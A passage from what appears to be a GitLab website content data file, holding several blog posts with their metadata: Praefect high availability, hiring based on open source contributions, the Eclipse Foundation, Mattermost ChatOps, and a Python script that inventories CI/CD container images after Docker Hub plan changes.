that wasn’t always the case. When you have an optional part in your architecture, if you’re debugging or talking with customers, there is the additional mental burden of verifying what the architecture looks like. Without it, you can make much quicker assumptions on what's going on and why it's working or why it isn't. 
Officially, we have deprecated NFS, so it makes sense to make it a required component so we can depend on it being there.\n\nAlso, as we add more features to Praefect, if it’s still optional then some customers get those added benefits and some don’t.\n\n### We should have put it in production sooner\n\nOur first iteration was just proxying the traffic, doing nothing with it, and verifying that it works. We didn't put it in production because it offered nothing to the community. But, it includes new components in your architecture, which our SREs need to know about, and there were a couple of bugs we found out much later. I was hesitant to put something in production that didn't offer anything in return, but if we’d been a little more aggressive with putting it out there – even just for a small subset of projects – we would understand more quickly what we're running, what was working, and what wasn't. \n\n### Applying big architectural changes takes time\n\nIf you ask customers to make giant architectural changes, it's going to take longer than you think. When we released Praefect and Gitaly Clusters in 13.0, it was fairly rough around the edges and some things weren't working as you would expect, but it was a good time to release because now, six months later, we see customers finally starting to implement it. They want to validate, try it out on a subset, and then finally roll it out for their whole GitLab instance. While that took longer than I expected, it's cool to see the numbers going up now, and adoption is growing quite rapidly.\n\n## More than just a traffic manager\n\nPraefect does much more than just inspect the traffic. If Gitaly goes down, ideally you want to notice that before you actually fire a request, which Praefect does. It does failover, so if one fails and it was designated as a primary, then it fails over to a secondary, which is now designated as a primary. 
\n\nI'm really excited for the next few years and the kind of things we are planning to build in Praefect and what that will deliver to GitLab.com and our customers and community. Where before we didn’t have very granular control over what we were doing or why we were doing it, now we can intercept and optimize.\n\n## What's next\n\nWe're shipping [HA Distributed Reads](https://gitlab.com/gitlab-org/gitaly/-/issues/3334) in GitLab 13.8 (Jan. 22, 2021). For 13.9, we're shooting for [strong consistency in the Gitaly Cluster](https://gitlab.com/groups/gitlab-org/-/epics/1189) and [variable replication factor](https://gitlab.com/groups/gitlab-org/-/epics/3372).\n\nFor GitLab self-managed users, consider enabling Praefect if you have high availability requirements. Visit our [Gitaly Clusters documentation](https://docs.gitlab.com/ee/administration/gitaly/praefect.html) to get started.\n\n_Major thanks to [Rebecca Dodd](/company/team#rebecca) who contributed to this post._\n\nCover image by [Yoel J Gonzalez](https://unsplash.com/@yoeljgonzalez?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText) on [Unsplash](https://unsplash.com/s/photos/traffic?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText)\n{: .note}\n",[953,751,803,231,9],{"slug":2875,"featured":6,"template":689},"high-availability-git-storage-with-praefect","content:en-us:blog:high-availability-git-storage-with-praefect.yml","High Availability Git Storage With 
Praefect","en-us/blog/high-availability-git-storage-with-praefect.yml","en-us/blog/high-availability-git-storage-with-praefect",{"_path":2881,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2882,"content":2888,"config":2893,"_id":2895,"_type":14,"title":2896,"_source":16,"_file":2897,"_stem":2898,"_extension":19},"/en-us/blog/hiring-based-on-open-source-contributions-could-be-harmful",{"title":2883,"description":2884,"ogTitle":2883,"ogDescription":2884,"noIndex":6,"ogImage":2885,"ogUrl":2886,"ogSiteName":673,"ogType":674,"canonicalUrls":2886,"schema":2887},"We all love open source, but hiring based on contributions could be harmful","An industry expert from Indeed says it's a bad idea to make hiring decisions based on GitHub activity.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678750/Blog/Hero%20Images/man-coding.jpg","https://about.gitlab.com/blog/hiring-based-on-open-source-contributions-could-be-harmful","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We all love open source, but hiring based on contributions could be harmful\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2018-11-16\",\n      }",{"title":2883,"description":2884,"authors":2889,"heroImage":2885,"date":2890,"body":2891,"category":10,"tags":2892},[2071],"2018-11-16","\nThere’s been a lot of chatter about using open source contributions as a metric in the hiring process. 
After some intense discussions on social media, Ashe Dryden, a programmer and diversity advocate and consultant, [wrote about the ethical problems with hiring based on GitHub activity and open source contributions](https://www.ashedryden.com/blog/the-ethics-of-unpaid-labor-and-the-oss-community) back in 2013, and the topic resurfaces every few months.\n\nMost recently, [@ReBeccaOrg](https://twitter.com/ReBeccaOrg/status/954081973814755328) and [@Joemccann](https://twitter.com/joemccann/status/1004798006485573632) kicked up more discussion with their respective tweets, inspiring the head of open source at job site [Indeed.com](https://www.indeed.com/about), Duane O'Brien, to take it to the next level with a conference talk.\n\n\"This talk was inspired by a discussion from earlier in the year about a startup that tried to create a ranking algorithm to identify job candidates based solely on their GitHub activity,\" he explains. \"In fact, between the time that I started putting together the talk and the first time that I gave it, the topic had blown up on Twitter again because someone else had started talking about how they don't even look at resumes anymore, they just look at GitHub profiles. People were pointing out why this is problematic.\"\n\n### 1. It creates an uneven playing field\n\nWhile hiring based on GitHub profiles is not a universal practice, Duane says it has been going on for a while. He says the practice can inadvertently create bias.\n\n\"A problem with biasing your hiring process toward people who have a history of open source work is that it is likely you're expecting that they've done it in their free time\u003Csup>(1)(2)\u003C/sup>. And the demographic that historically has the most available free time [trends towards male](https://www.unece.org/info/media/news/statistics/2016/how-much-free-time-do-we-have/doc.html),\" he says. 
\"Because of this, there can be an unexpected effect of filtering out people who are primary caregivers or young parents, or people who are making a career transition and have to work two jobs, those who bear disproportionate household responsibilities, and so on.\"\n\n### 2. It plays up a sometimes unattainable standard\n\nAnother concern for critics of open source contribution-focused hiring is that it can perpetuate this mantra that you have to be coding nonstop to be considered a real developer.\n\n\"There's [this perception](https://www.codementor.io/@codementorteam/how-to-get-your-first-developer-job-even-if-you-don-t-have-a-cs-degree-8b60y8ch2), especially in Silicon Valley, that [if you are not eating, breathing, and sleeping code](https://www.businessinsider.com/why-one-programmer-hates-the-popular-eat-sleep-code-repeat-t-shirt-2016-5) at work and during all your spare time and don't have a bunch of [personal side projects](https://insights.dice.com/2013/11/15/improve-chance-landing-job-personal-project/), that you don't take it seriously or are [not as desirable of a candidate](https://techbeacon.com/what-do-job-seeking-developers-need-their-github) as someone who does spend all their time on coding,\" Duane says. \"I think that places an unfair claim on people's free time, and what they should be doing with it. Especially those with families. Most people expect flexibility and wouldn’t want to work for an employer who has unrealistic expectations.\"\n\n### Open source's place in hiring\n\nOpen source participation does have a role in hiring, but it should not be the be-all and end-all for a candidate. If you’re looking for someone who has experience working within a particular open source community or project, then it makes sense to look at the open source contributions of job candidates, O’Brien said. 
But in most cases, there are other ways to evaluate applicants and also keep the playing field even.\n\n\"If you're looking to hire for an engineering position and you've got two engineers, one of whom has a robust history of working in open source, and one of them who doesn't have any open source footprint at all, rather than automatically interpreting one candidate as less desirable than the other, I recommend finding another way to get a look at their skills,\" Duane advised. \"You can do that by asking them for code samples, or having them do panel interviews or take-home assessment-based assignments. Some companies are also offering contract work to potential candidates as a way to try them out on the job. Honeycomb.io has done some of this.\u003Csup>(3)\u003C/sup> This ‘hiring in production’ mentality seems to be emerging as a practice.\"\n\n### Suggestions for job hunters\n\nJob seekers who have little to no open source experience should be prepared for questions about their lack of participation. Be straightforward about your constraints, be it a lack of time, interest or opportunity, and offer code samples that allow employers to view your skills in action. Duane says it is also important to interview your potential employer to make sure their expectations are in line with your wants and needs.\n\nFor those looking to get some open source experience, there are a number of ways to get involved, including, of course, [GitLab](/community/contribute/). Duane pointed to paid opportunities like [Outreachy](https://www.outreachy.org/), which offers internships to people in underrepresented groups to support them in making their first contributions into open source, as well as bug bounties.\n\nDuane recently presented his talk at All Things Open and the Seattle GNU/Linux conference. 
He may present the talk again at a few more events in the near future.\n\n\"Since it's a topic that seems to come up in our social sphere every few months or so, I want to encourage us to go back and look at Ashe's blog post, and the other people who've already been talking about it,\" he said. \"There are many different ways to evaluate candidates besides just looking at their GitHub data, and it’s important that we look at the whole picture when we evaluate candidates.\"\n\nWhat role do you think open source contributions should play in the hiring process? Sound off on Twitter and let us know [@GitLab](https://twitter.com/gitlab) or comment below.\n\n**Footnotes**\n\n[1](http://opensourcesurvey.org/2017/#insights),\n[2](https://assets.digitalocean.com/currents-report/DigitalOcean-Currents-Q4-2017.pdf),\n3 You can see some discussion of this in this [Twitter thread](https://twitter.com/DuaneOBrien/status/963499537154310145), which refers to the [first Sentry Scouts meetup](https://sentry.io/_/events/2018-01-17-sentry-scouts-1/).\n{: .note}\n",[1078,9,267],{"slug":2894,"featured":6,"template":689},"hiring-based-on-open-source-contributions-could-be-harmful","content:en-us:blog:hiring-based-on-open-source-contributions-could-be-harmful.yml","Hiring Based On Open Source Contributions Could Be Harmful","en-us/blog/hiring-based-on-open-source-contributions-could-be-harmful.yml","en-us/blog/hiring-based-on-open-source-contributions-could-be-harmful",{"_path":2900,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2901,"content":2907,"config":2913,"_id":2915,"_type":14,"title":2916,"_source":16,"_file":2917,"_stem":2918,"_extension":19},"/en-us/blog/how-eclipse-foundation-champions-open-source-with-gitlab",{"title":2902,"description":2903,"ogTitle":2902,"ogDescription":2903,"noIndex":6,"ogImage":2904,"ogUrl":2905,"ogSiteName":673,"ogType":674,"canonicalUrls":2905,"schema":2906},"How the Eclipse Foundation champions open source with GitLab","In this interview, learn how 
adopting GitLab helps the Eclipse Foundation be a more effective champion for open source.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679184/Blog/Hero%20Images/eclipsefoundationcover.png","https://about.gitlab.com/blog/how-eclipse-foundation-champions-open-source-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How the Eclipse Foundation champions open source with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-10-19\",\n      }",{"title":2902,"description":2903,"authors":2908,"heroImage":2904,"date":2910,"body":2911,"category":10,"tags":2912},[2909],"Bryan Behrenshausen","2023-10-19","\nThe Eclipse Foundation is a pillar of the open source ecosystem. Home to more than 415 open source projects, the not-for-profit organization has been championing open source collaboration and innovation for more than two decades.\n\nGitLab plays a significant role in the Eclipse Foundation's operations, and the organization recently joined the GitLab [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) community. To mark the occasion, I caught up with Denis Roy, IT director at the Eclipse Foundation, to chat about the organization's history, vision, and passion for open source development.\n\n**We're so excited to welcome the Eclipse Foundation to the GitLab Open Source Partners community. You've been champions of open source for quite some time. Tell us about your history and the mission that guides you today.**\n\nThe Eclipse Foundation was born in 2004, as a not-for-profit, [open source](https://go.gitlab.com/spHNym) software foundation with the goal of driving the evolution of the Eclipse Platform and its ecosystem of tools, plugins, and addons in a vendor-neutral, open, and transparent community. 
Since then, the Eclipse Foundation has become one of the world's largest open source software foundations. The foundation offers a mature, scalable, and business-friendly environment for open source software collaboration and innovation, hosting more than 415 open source projects, including runtimes, tools, and frameworks for a wide range of technology domains such as the Internet of Things, automotive, geospatial, systems engineering, and many others.\n\n> Connect with the GitLab Open Source Partners on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n\n**How does the Eclipse Foundation use GitLab? What has using GitLab helped you accomplish?**\n\nGitLab has allowed us to modernize our development platform, because it offers an integrated, cohesive environment to help maximize developer productivity while reducing the administrative overhead related to managing such a complex set of tools. With a single package to upgrade and maintain, and tight integration between code repositories, issue trackers, wikis, code review, and CI tools, it's easier for the Eclipse Foundation's IT team to stay up to date. This has allowed us to reduce our reliance on customized, in-house code.\n\nWhen we began our work in 2004, open source code hosting options were rudimentary and limited. At the time, we created our own forge by using a handful of tools that were not designed with interoperability in mind, including [CVS](https://www.nongnu.org/cvs/), [Bugzilla](https://www.bugzilla.org/), and [MediaWiki](https://www.mediawiki.org/wiki/MediaWiki). When it came time to refresh our offering, it was an easy decision to replace our home-grown forge with GitLab, since GitLab offers a seamless integration of all these developer tools, and many more, within a single, easy-to-use package. 
This creates a very useful environment for our developers and allows the project teams to be productive while offering a familiar interface for interacting and building their user communities.\n\nAt this time, [the Eclipse Foundation's GitLab instance](https://gitlab.eclipse.org) hosts more than 70 [open source software projects](https://gitlab.eclipse.org/eclipse) and dozens of other projects that [help us manage and support our community](https://gitlab.eclipse.org/eclipsefdn).\n\n**How big is the Eclipse Foundation's IT team? What have you seen the team achieve after the migration to GitLab?**\n\nThe Foundation's IT team consists of a dozen people, split almost evenly between infrastructure, release engineering, security, and web development. Our migration to GitLab is still a work in progress, but it's allowing the Eclipse Foundation IT team to consolidate our code repositories, issues, and documentation onto a single platform with a modern and friendly UI. The same is also true for the Eclipse OSS projects that have, or are currently migrating from, \"pure Git\" to GitLab.\n\nWith GitLab, the team is seeing a notable decrease in both administrative overhead and user support, as using, managing, and maintaining GitLab on premise is straightforward and very robust. We're able to stay up-to-date with new GitLab releases easily, which scores extra points with our security team. We're able to use that freed time towards activities that benefit our community and provide extra value.\n\n**What's on the horizon for the Eclipse Foundation? What are your most important initiatives right now?**\n\nOne of the big initiatives we’re working on right now is improving the security of our open source projects. 
We’ve made a significant investment in security over the past year, including auditing some of our top projects for security concerns and we are looking to establish a [working group](https://www.eclipse.org/org/workinggroups/eclipse-cyber-risk-concept.php) to help us gain the resources we need to enhance our security processes across all of our operations.\n\nWe're also focused on growing the [Eclipse Software Defined Vehicle](https://sdv.eclipse.org/) community, which continues to gain momentum with new members like General Motors, Qualcomm, and Microsoft. The automotive industry is becoming increasingly willing to collaborate on open source software, and experience the technological and business benefits of doing so.  \n\n**How can GitLab community members get more involved in the Eclipse Foundation's work?**\n\nIt's easy! Browse the list of [Eclipse Projects](https://projects.eclipse.org/) and discover the Developer Resources section. Or browse the list of projects on Eclipse's [GitLab instance](https://gitlab.eclipse.org/eclipse) and send in those merge requests!\n\n## Learn more\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. 
Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n",[9,267,1099],{"slug":2914,"featured":6,"template":689},"how-eclipse-foundation-champions-open-source-with-gitlab","content:en-us:blog:how-eclipse-foundation-champions-open-source-with-gitlab.yml","How Eclipse Foundation Champions Open Source With Gitlab","en-us/blog/how-eclipse-foundation-champions-open-source-with-gitlab.yml","en-us/blog/how-eclipse-foundation-champions-open-source-with-gitlab",{"_path":2920,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2921,"content":2927,"config":2934,"_id":2936,"_type":14,"title":2937,"_source":16,"_file":2938,"_stem":2939,"_extension":19},"/en-us/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops",{"title":2922,"description":2923,"ogTitle":2922,"ogDescription":2923,"noIndex":6,"ogImage":2924,"ogUrl":2925,"ogSiteName":673,"ogType":674,"canonicalUrls":2925,"schema":2926},"Teams speed development with GitLab & Mattermost ChatOps","A complete DevOps toolchain plus open source messaging and ChatOps – what’s not to love?","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680983/Blog/Hero%20Images/mattermost-gitlab.png","https://about.gitlab.com/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How enterprise dev teams use GitLab and Mattermost ChatOps to accelerate development\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jason Blais – Mattermost\"}],\n        \"datePublished\": \"2020-01-13\",\n      }",{"title":2928,"description":2923,"authors":2929,"heroImage":2924,"date":2931,"body":2932,"category":10,"tags":2933},"How enterprise dev teams use GitLab and Mattermost ChatOps to accelerate development",[2930],"Jason Blais – Mattermost","2020-01-13","\n\nThere has never been more pressure on development 
teams to build software faster and more efficiently. The rise in popularity of DevOps has largely been the result of its promise to speed up dev cycles, increase agility, and help teams resolve issues more quickly. And while the availability and sophistication of DevOps tools have improved greatly in the last few years, simply choosing the latest and greatest tools is no guarantee of a smooth, problem-free development lifecycle.\n\n## Why GitLab\n\nIn an ecosystem with exponentially increasing choice and complexity, GitLab provides a complete open source [DevOps platform](/solutions/devops-platform/) that can speed up cycles, reduce development costs, and improve developer efficiency. From planning and code to deployment and monitoring (and back again), GitLab brings a myriad of tools together into one open source toolset.\n\n## Why Mattermost ChatOps\n\nWe’re big fans of GitLab here at Mattermost, which is why Mattermost is packaged with GitLab Omnibus and why we work to make sure Mattermost is easy to [set up with GitLab](https://gitlab.com/gitlab-org/omnibus-gitlab/tree/master/doc/gitlab-mattermost).\n\n[Mattermost’s open source ChatOps platform](https://mattermost.com/blog/introducing-mattermost-chatops/) allows you to surface relevant information to your team and enables you to take action directly where you’re having conversations. When an issue comes in, a ChatOps workflow can alert relevant team members, who all work together to make a fix directly within Mattermost.\n\nChatOps provides a method to interact with CI/CD jobs through messaging. Many organizations’ discussion, collaboration, and troubleshooting is taking place in messaging services these days, and having a method to run CI/CD jobs with output posted back to the channel can significantly accelerate a team’s workflow. 
ChatOps not only increases communication and collaboration, but a searchable history of the conversations associated with your development cycle increases transparency and creates a repository of valuable information for the team.\n\n## Mattermost + GitLab\n\nA complete DevOps toolchain plus open source messaging and ChatOps – what’s not to love? With GitLab and Mattermost, teams can not only simplify their DevOps process, but also bring their processes into the same chat interface where team members are discussing issues, collaborating, and making decisions.\n\nHere are a couple of examples of how development teams use Mattermost and GitLab together to accelerate developer productivity through ChatOps.\n\n### itk uses GitLab and Mattermost to ship more code on time and 6x production deployments per year\n\n[Itk](https://www.itk.fr/en/), based in Montpellier, France, develops tools and applications to help farmers optimize yields, increase the quality of crops, and manage risks more effectively.\n\nThey began using GitLab around 2014 and primarily used a legacy chat tool for day-to-day collaboration, messaging, and video calling. However, as the company grew, this tool didn’t scale with them; there was no persistent, easily searchable messaging, and collaboration across the team became more difficult. They began to look for an alternative.\n\nShortly thereafter, they discovered that the GitLab Omnibus package ships with an open source messaging platform for developers: Mattermost. They immediately fell in love with its easy code-sharing capabilities – including automatic syntax highlighting and full Markdown support, and the ease of sharing knowledge, searching past conversations, and collaborating on ideas across the team to develop new solutions all integrated together with GitLab.\n\nBefore switching to Mattermost, team members hadn’t been able to easily get notified about their development process. 
But they wanted to be able to visibly track projects, merge requests, and other activities from GitLab.\n\nThis is when Romain Maneschi, a software developer at itk, began writing a GitLab plugin for Mattermost that would further enable his team to subscribe to GitLab notifications in Mattermost and receive notifications about new issue assignments and review requests in one place.\n\nToday, [the plugin supports](https://github.com/mattermost/mattermost-plugin-gitlab):\n\n- **Daily reminders** – get informed on what issues and merge requests need your attention\n- **Notifications** – get notified in Mattermost when someone mentions you, requests your review, or assigns an issue to you on GitLab\n- **Sidebar buttons** – stay up-to-date with how many reviews, unread messages, assignments and open merge requests you have with buttons in the Mattermost sidebar\n- **Subscribe to projects** – use slash commands to subscribe a Mattermost channel to receive notifications of new merge requests or issues in a GitLab project\n\nNow, his whole company uses both GitLab and Mattermost to accelerate workflows through ChatOps. As a result, they now ship more code on time, resulting in 3x growth in the number of projects and microservices managed by the team and 6x growth in the number of production deployments within a year – all while growing their dev and agronomist teams by 5x.\n\n![GitLab Mattermost plugin](https://about.gitlab.com/images/blogimages/gitlab-mattermost-plugin.png){: .shadow.medium.center}\n\u003C!-- image: https://user-images.githubusercontent.com/13119842/70714554-5b52cc80-1cb6-11ea-9cd6-705a68f9ac1b.png -->\n\n### A software development company increases productivity through better transparency and visibility into code and configuration changes\n\nA software development and data services company based in the state of Maryland has also rolled out Mattermost integrated with GitLab to increase productivity and seamlessly collaborate.  
They provide analytics, data management, and software development services to biomedical researchers and organizations worldwide.\n\nGitLab is heavily used across their team and they consider it a huge asset in their DevOps workflows.\n\nThey have also integrated GitLab and Mattermost together by pushing GitLab commits to a single Mattermost channel via webhooks, enabling senior management to get a bird’s-eye view of everything that’s rolling through in a given day. It includes updates for configuration management and version control, giving a snapshot of different changes made to internal infrastructure and systems throughout the day.\n\nThe team has also set up separate “Heartbeat” channels to send notifications on application events. Having these messages funnel to specific Heartbeat channels avoids distracting the flow of conversations in regular project collaboration channels while empowering team members to jump on issues posted in the Heartbeat channels.\n\nOne of the key benefits this integration brings to the team is the visibility of changes made to versions and configuration management in real time; as soon as a change is committed and pushed live, a notification is sent to the Heartbeat channel which anyone can subscribe to. No more switching between apps, asking team members, or tracking down commits – it’s now all in one place inside Mattermost while configuration management and app development take place in GitLab.\n\n### GitLab and Mattermost ChatOps improve transparency and productivity to accelerate development\n\nMattermost [ships as part of the GitLab Omnibus package](https://docs.gitlab.com/omnibus/gitlab-mattermost/), providing out-of-the-box support for GitLab SSO, pre-packaged GitLab integrations, and PostgreSQL support, along with a Prometheus integration that enables systems monitoring and [incident response management](https://docs.gitlab.com/ee/user/project/integrations/prometheus.html#taking-action-on-incidents). 
Finally, Mattermost can now also be deployed [with GitLab Cloud Native](https://docs.mattermost.com/install/install-mmte-helm-gitlab-helm.html).\n\nThere’s never been a better time for DevOps teams to get the full benefits of open source ChatOps. Try it out by installing GitLab Omnibus with Mattermost today.",[779,231,9],{"slug":2935,"featured":6,"template":689},"how-enterprise-dev-teams-use-gitlab-mattermost-chatops","content:en-us:blog:how-enterprise-dev-teams-use-gitlab-mattermost-chatops.yml","How Enterprise Dev Teams Use Gitlab Mattermost Chatops","en-us/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops.yml","en-us/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops",{"_path":2941,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2942,"content":2948,"config":2954,"_id":2956,"_type":14,"title":2957,"_source":16,"_file":2958,"_stem":2959,"_extension":19},"/en-us/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub",{"title":2943,"description":2944,"ogTitle":2943,"ogDescription":2944,"noIndex":6,"ogImage":2945,"ogUrl":2946,"ogSiteName":673,"ogType":674,"canonicalUrls":2946,"schema":2947},"GitLab helps mitigate Docker Hub's open source image removal","CI/CD and Kubernetes deployments can be affected by Docker Hub tier changes. 
This tutorial walks through analysis, mitigations, and long-term solutions.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659883/Blog/Hero%20Images/post-cover-image.jpg","https://about.gitlab.com/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab can help mitigate deletion of open source container images on Docker Hub\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Michael Friedrich\"}],\n        \"datePublished\": \"2023-03-16\"\n      }",{"title":2949,"description":2944,"authors":2950,"heroImage":2945,"date":2951,"body":2952,"category":801,"tags":2953},"How GitLab can help mitigate deletion of open source container images on Docker Hub",[1798],"2023-03-16","\nDocker, Inc. shared an email update to Docker Hub users that it will [sunset Free Team organizations](https://www.infoworld.com/article/3690890/docker-sunsets-free-team-subscriptions-roiling-open-source-projects.html). If accounts do not upgrade to a paid plan before April 14, 2023, their organization's images may be deleted after 30 days. This change can affect open source organizations that publish their images on Docker Hub, as well as consumers of these container images, used in CI/CD pipelines, Kubernetes cluster deployments, or docker-compose demo environments. This blog post discusses tools and features on the GitLab DevSecOps platform to help users analyze and mitigate the potential impact on production environments.\n\n_Update (March 20, 2023): Docker, Inc. [published an apology blog post](https://www.docker.com/blog/we-apologize-we-did-a-terrible-job-announcing-the-end-of-docker-free-teams/), including a FAQ, and clarifies that the company will not delete container images by themselves. Maintainers can migrate to a personal account, join the Docker-sponsored open source program, or opt into a paid plan. 
If open source container image maintainers do nothing, this leads into another issue: Stale container images can become a security problem. The following blog post can help with security analysis and migration too._ \n\n_Update (March 27, 2023): On March 24, 2023, Docker, Inc. [published another blog post](https://www.docker.com/blog/no-longer-sunsetting-the-free-team-plan/) announcing the reversal of the decision to sunset the Free team plan and updated its [FAQ for Free Team organization](https://www.docker.com/developers/free-team-faq/). While this is a welcome development for the entire community, it is still crucial to ensure the reliability of your software development lifecycle by ensuring redundancies are in place for your container registries, as detailed in this blog post._\n\n### Inventory of used container images\n\nCI/CD pipelines in GitLab can execute jobs in containers. This is specified by the [`image` keyword](https://docs.gitlab.com/ee/ci/yaml/#image) in jobs, job templates, or as a global [`default`](https://docs.gitlab.com/ee/ci/yaml/#default) attribute. For the first iteration, you can clone a GitLab project locally, and search for the `image` string in all CI/CD configuration files. The following example shows how to execute the `find` command on the command line interface (CLI), searching for files matching the name pattern `*ci.yml`, and looking for the `image` string in the file content. The command line prints a list of search pattern matches, and the corresponding file name to the standard output. The example inspects the [project](https://gitlab.com/gitlab-com/www-gitlab-com) for the [GitLab handbook](https://about.gitlab.com/handbook/) and [website](https://about.gitlab.com/) to analyze whether its CI/CD deployment pipelines could be affected by the Docker Hub changes.\n\n```bash\n$ git clone https://gitlab.com/gitlab-com/www-gitlab-com && cd www-gitlab-com\n\n$ find . 
-type f -iname '*ci.yml' -exec sh -c \"grep 'image:' '{}' && echo {}\" \\;\n\n  image: registry.gitlab.com/gitlab-org/gitlab-build-images:www-gitlab-com-debian-${DEBIAN_VERSION}-ruby-3.0-node-16\n  image: alpine:edge\n  image: alpine:edge\n  image: debian:stable-slim\n  image: debian:stable-slim\n  image: registry.gitlab.com/gitlab-org/gitlab-build-images:danger\n./.gitlab-ci.yml\n```\n\nA [discussion on Hacker News](https://news.ycombinator.com/item?id=35168802) mentions that \"official Docker images\" are not affected, but this is not officially confirmed by Docker yet. [Official Docker images](https://hub.docker.com/u/library) do not use a namespace prefix, i.e. `namespace/imagename` but instead `debian:\u003Ctagname>` for example. `registry.gitlab.com/gitlab-org/gitlab-build-images:danger` uses a full URL image string, which includes the image registry server domain, `registry.gitlab.com` in the shown example.\n\nIf there is no full URL prefix in the image string, this is an indicator that this image could be pulled from Docker Hub by default. There might be other infrastructure safety nets put in place, for example a cloud provider registry which caches the Docker Hub images (Google Cloud, AWS, Azure, etc.).\n\n#### Advanced search for images\n\nYou can use the [project lint API endpoint](https://docs.gitlab.com/ee/api/lint.html#validate-a-projects-ci-configuration) to fetch the CI configuration. The following script uses the [python-gitlab API library](https://python-gitlab.readthedocs.io/en/stable/gl_objects/ci_lint.html) to implement the API endpoint:\n\n1. Collect all projects from either a single project ID, a group ID with projects, or from the instance.\n2. Run the `project.ci_lint.get()` method to get a merged yaml configuration for CI/CD from the current GitLab project.\n3. 
Parse the yaml content and print only the job names, and the image keys.\n\nThe [full script is located here](https://gitlab.com/gitlab-da/use-cases/gitlab-api/gitlab-api-python/-/blob/main/get_all_cicd_job_images.py), and is open source, licensed under MIT.\n\n```python\n#!/usr/bin/env python\n\nimport gitlab\nimport os\nimport sys\nimport yaml\n\nGITLAB_SERVER = os.environ.get('GL_SERVER', 'https://gitlab.com')\nGITLAB_TOKEN = os.environ.get('GL_TOKEN') # token requires developer permissions\nPROJECT_ID = os.environ.get('GL_PROJECT_ID') #optional\n# https://gitlab.com/gitlab-da/use-cases/docker\nGROUP_ID = os.environ.get('GL_GROUP_ID', 65096153) #optional\n\n#################\n# Main\n\nif __name__ == \"__main__\":\n    if not GITLAB_TOKEN:\n        print(\"🤔 Please set the GL_TOKEN env variable.\")\n        sys.exit(1)\n\n    gl = gitlab.Gitlab(GITLAB_SERVER, private_token=GITLAB_TOKEN)\n\n    # Collect all projects, or prefer projects from a group id, or a project id\n    projects = []\n\n    # Direct project ID\n    if PROJECT_ID:\n        projects.append(gl.projects.get(PROJECT_ID))\n\n    # Groups and projects inside\n    elif GROUP_ID:\n        group = gl.groups.get(GROUP_ID)\n\n        for project in group.projects.list(include_subgroups=True, all=True):\n            # https://python-gitlab.readthedocs.io/en/stable/gl_objects/groups.html#examples\n            manageable_project = gl.projects.get(project.id)\n            projects.append(manageable_project)\n\n    # All projects on the instance (may take a while to process)\n    else:\n        projects = gl.projects.list(get_all=True)\n\n    print(\"# Summary of projects and their CI/CD image usage\")\n\n    # Loop over projects, fetch .gitlab-ci.yml, run the linter to get the full translated config, and extract the `image:` setting\n    for project in projects:\n\n        print(\"# Project: {name}, ID: {id}\\n\\n\".format(name=project.name_with_namespace, id=project.id))\n\n        # 
https://python-gitlab.readthedocs.io/en/stable/gl_objects/ci_lint.html\n        lint_result = project.ci_lint.get()\n\n        data = yaml.safe_load(lint_result.merged_yaml)\n\n        for d in data:\n            print(\"Job name: {n}\".format(n=d))\n            for attr in data[d]:\n                if 'image' in attr:\n                    print(\"Image: {i}\".format(i=data[d][attr]))\n\n        print(\"\\n\\n\")\n\nsys.exit(0)\n```\n\nThe [script](https://gitlab.com/gitlab-de/use-cases/gitlab-api/gitlab-api-python/-/blob/main/get_all_cicd_job_images.py) requires Python (tested with 3.11) and the python-gitlab and pyyaml modules. Example on macOS with Homebrew:\n\n```shell\n$ brew install python\n$ pip3 install python-gitlab pyyaml\n```\n\nYou can execute the script and set the different environment variables to control its behavior:\n\n```shell\n$ export GL_TOKEN=$GITLAB_TOKEN\n\n$ export GL_GROUP_ID=12345\n$ export GL_PROJECT_ID=98765\n\n$ python3 get_all_cicd_job_images.py\n\n# Summary of projects and their CI/CD image usage\n# Project: Developer Evangelism at GitLab  / use-cases / Docker Use cases  / Custom Container Image Python, ID: 44352983\n\nJob name: docker-build\nImage: docker:latest\n\n# Project: Developer Evangelism at GitLab  / use-cases / Docker Use cases  / Gitlab Dependency Proxy, ID: 44351128\n\nJob name: .test-python-version\nJob name: image-docker-hub\nImage: python:3.11\nJob name: image-docker-hub-dep-proxy\nImage: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/python:3.11\n```\n\nPlease verify the script and fork it for your own analysis and mitigation. The missing parts are checking the image URLs, and doing a more sophisticated search. 
